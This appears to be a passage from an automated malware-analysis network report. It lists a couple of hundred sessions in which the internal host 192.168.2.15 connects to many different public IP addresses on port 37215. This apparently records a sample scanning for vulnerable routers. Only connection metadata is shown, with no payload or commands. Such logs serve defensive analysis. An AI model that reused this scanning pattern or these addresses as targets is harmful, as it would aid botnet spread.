                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21886192.168.2.1555090138.87.110.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21887192.168.2.1548804190.51.218.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21888192.168.2.153895237.182.218.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21889192.168.2.1538684102.87.194.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21890192.168.2.1548590157.115.40.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21891192.168.2.155729494.117.73.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21892192.168.2.155695031.211.124.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21893192.168.2.1537812197.189.45.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21894192.168.2.1546282156.177.170.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21895192.168.2.1546338138.112.232.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21896192.168.2.1545084122.232.121.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21897192.168.2.1534918222.98.35.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21898192.168.2.15592748.2.202.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21899192.168.2.1556484190.109.17.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21900192.168.2.1549042222.223.163.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21901192.168.2.1550570102.158.91.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21902192.168.2.1554606190.35.199.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21903192.168.2.1557858138.215.30.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21904192.168.2.154145094.160.122.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21905192.168.2.1542908186.171.253.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21906192.168.2.154275031.54.184.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21907192.168.2.153476831.30.253.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21908192.168.2.1554718157.190.125.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21909192.168.2.155666031.41.63.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21910192.168.2.1541930157.249.85.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21911192.168.2.1544044102.97.164.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21912192.168.2.1548332222.36.35.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21913192.168.2.1544968186.204.184.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21914192.168.2.1544372121.100.139.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21915192.168.2.1560310121.219.12.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21916192.168.2.1534272122.104.165.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21917192.168.2.153486045.62.141.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21918192.168.2.1555136181.200.159.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21919192.168.2.1541214190.184.179.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21920192.168.2.1549060181.53.86.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21921192.168.2.1548068186.39.34.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21922192.168.2.1554496156.208.60.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21923192.168.2.153851837.170.246.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21924192.168.2.1555102157.105.72.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21925192.168.2.1545352181.203.164.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21926192.168.2.1552656102.186.234.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21927192.168.2.153369045.45.130.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21928192.168.2.153727437.167.177.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21929192.168.2.153425637.134.75.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21930192.168.2.1539308190.204.75.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21931192.168.2.1556912181.152.202.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21932192.168.2.1547112157.9.109.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21933192.168.2.1555328190.208.26.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21934192.168.2.1540338181.42.254.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21935192.168.2.1556140102.230.159.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21936192.168.2.153848637.139.250.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21937192.168.2.154664645.165.127.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21938192.168.2.1541712157.156.150.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21939192.168.2.1557678181.90.2.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21940192.168.2.1543624186.192.208.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21941192.168.2.1549982138.250.43.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21942192.168.2.155394294.255.15.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21943192.168.2.1550278197.10.63.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21944192.168.2.1534948122.136.165.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21945192.168.2.154791045.119.249.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21946192.168.2.1551042157.50.167.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21947192.168.2.154660894.109.10.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21948192.168.2.1557856122.133.200.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21949192.168.2.1549618186.174.49.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21950192.168.2.154892237.17.63.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21951192.168.2.1540878181.211.17.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21952192.168.2.1548888156.209.83.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21953192.168.2.1535352190.172.63.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21954192.168.2.1560924186.211.142.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21955192.168.2.1542188186.158.47.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21956192.168.2.1534162122.32.19.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21957192.168.2.1547396121.26.211.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21958192.168.2.1533000222.46.2.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21959192.168.2.1536486121.214.246.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21960192.168.2.1558086138.59.174.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21961192.168.2.1550414186.117.234.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21962192.168.2.1538030181.125.23.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21963192.168.2.153885431.11.250.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21964192.168.2.1555670222.28.105.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21965192.168.2.1540130181.140.69.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21966192.168.2.153546494.111.212.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21967192.168.2.1546572181.233.42.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21968192.168.2.1540906186.124.48.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21969192.168.2.1559306197.202.197.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21970192.168.2.1543176102.220.102.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21971192.168.2.1547770102.103.209.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21972192.168.2.1548948102.144.195.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21973192.168.2.1560744149.35.32.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21974192.168.2.1554160156.193.102.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21975192.168.2.1544402121.151.232.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21976192.168.2.1538940190.182.181.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21977192.168.2.154259282.221.82.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21978192.168.2.1550628181.240.15.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21979192.168.2.1532860156.143.191.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21980192.168.2.1556898121.52.244.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21981192.168.2.1547086222.254.187.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21982192.168.2.155081231.79.117.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21983192.168.2.1537676186.40.206.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21984192.168.2.1558162181.20.254.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21985192.168.2.1548460197.108.125.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21986192.168.2.155348637.132.175.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21987192.168.2.1537230190.72.209.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21988192.168.2.1541012190.25.25.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21989192.168.2.154738037.99.169.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21990192.168.2.1558540156.147.33.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21991192.168.2.155262641.244.99.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21992192.168.2.1535012181.83.38.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21993192.168.2.1545178181.74.251.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21994192.168.2.1534918121.80.36.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21995192.168.2.1549280122.248.196.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21996192.168.2.1540540186.159.104.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21997192.168.2.1543702222.251.31.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21998192.168.2.1549972157.147.23.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21999192.168.2.1556252157.189.116.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22000192.168.2.1538714186.234.1.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22001192.168.2.155510494.120.25.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22002192.168.2.1555004190.112.217.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22003192.168.2.154842031.41.64.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22004192.168.2.1545678156.142.107.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22005192.168.2.1535410181.164.12.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22006192.168.2.153742231.13.234.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22007192.168.2.155261637.249.173.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22008192.168.2.154924441.114.148.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22009192.168.2.153839645.254.144.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22010192.168.2.1559210156.46.178.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22011192.168.2.1547396181.42.53.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22012192.168.2.1540584181.115.152.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22013192.168.2.1554766102.98.220.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22014192.168.2.1546538222.96.22.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22015192.168.2.1534120186.66.52.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22016192.168.2.153323641.58.153.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22017192.168.2.1557948186.81.113.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22018192.168.2.1538262157.93.1.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22019192.168.2.155428845.42.230.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22020192.168.2.1533974181.230.17.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22021192.168.2.1545980190.97.129.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22022192.168.2.1553438222.3.73.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22023192.168.2.1546156190.52.15.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22024192.168.2.1542616157.229.48.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22025192.168.2.1559146222.249.186.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22026192.168.2.1535206156.252.234.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22027192.168.2.154605031.3.66.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22028192.168.2.1560624186.27.131.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22029192.168.2.1540824121.10.220.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22030192.168.2.153522231.223.156.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22031192.168.2.154117463.189.30.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22032192.168.2.1545024122.104.186.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22033192.168.2.1534594122.222.107.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22034192.168.2.1553512197.110.150.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22035192.168.2.1537546157.122.214.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22036192.168.2.1536566122.173.223.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22037192.168.2.1559944190.100.85.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22038192.168.2.155992441.236.234.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22039192.168.2.154371045.101.49.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22040192.168.2.1546108186.183.110.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22041192.168.2.1538758190.5.98.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22042192.168.2.156050494.112.92.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22043192.168.2.154052437.158.100.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22044192.168.2.1544886194.7.163.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22045192.168.2.1551670121.206.230.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22046192.168.2.1540962156.45.234.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22047192.168.2.154319494.71.127.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22048192.168.2.1540796157.169.236.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22049192.168.2.1558864181.2.50.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22050192.168.2.1557976122.145.234.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22051192.168.2.1551132102.88.240.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22052192.168.2.154937241.55.231.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22053192.168.2.1553854188.128.54.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22054192.168.2.154248645.27.84.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22055192.168.2.1532890197.210.163.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22056192.168.2.154521445.59.50.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22057192.168.2.1543008222.182.203.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22058192.168.2.1560880122.65.54.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22059192.168.2.1542462156.53.164.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22060192.168.2.1545112122.35.24.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22061192.168.2.153375045.86.21.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22062192.168.2.153838431.76.32.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22063192.168.2.1545974102.156.93.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22064192.168.2.1543660102.77.113.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22065192.168.2.1543818222.252.59.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22066192.168.2.154673294.201.111.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22067192.168.2.1556288181.186.169.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22068192.168.2.1560748218.216.89.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22069192.168.2.1558586190.144.113.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22070192.168.2.1537200186.64.40.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22071192.168.2.1543248222.50.229.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22072192.168.2.1535288190.46.242.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22073192.168.2.153678294.155.184.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22074192.168.2.1538464190.164.156.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22075192.168.2.1543558121.242.132.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22076192.168.2.156064094.247.151.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22077192.168.2.1548744186.158.183.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22078192.168.2.154938041.162.33.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22079192.168.2.1539274121.203.124.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22080192.168.2.1541784156.254.30.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22081192.168.2.1543900186.43.49.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22082192.168.2.1558440122.24.54.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22083192.168.2.1547286181.152.126.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22084192.168.2.1559554102.190.128.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22085192.168.2.1535748222.0.215.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22086192.168.2.1538464138.128.215.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22087192.168.2.1540584197.160.242.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22088192.168.2.154192831.113.190.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22089192.168.2.154297437.156.201.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22090192.168.2.1551902138.189.28.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22091192.168.2.1555658222.222.163.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22092192.168.2.153535894.72.14.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22093192.168.2.153392241.204.40.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22094192.168.2.1555896122.255.209.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22095192.168.2.1540174156.164.46.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22096192.168.2.1544004186.200.210.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22097192.168.2.155032841.172.94.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22098192.168.2.1537880190.205.249.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22099192.168.2.155953837.52.244.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22100192.168.2.1532998186.145.12.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22101192.168.2.1552950167.189.122.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22102192.168.2.156008845.37.52.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22103192.168.2.1556794190.251.96.12837215
                                              TimestampBytes transferredDirectionData


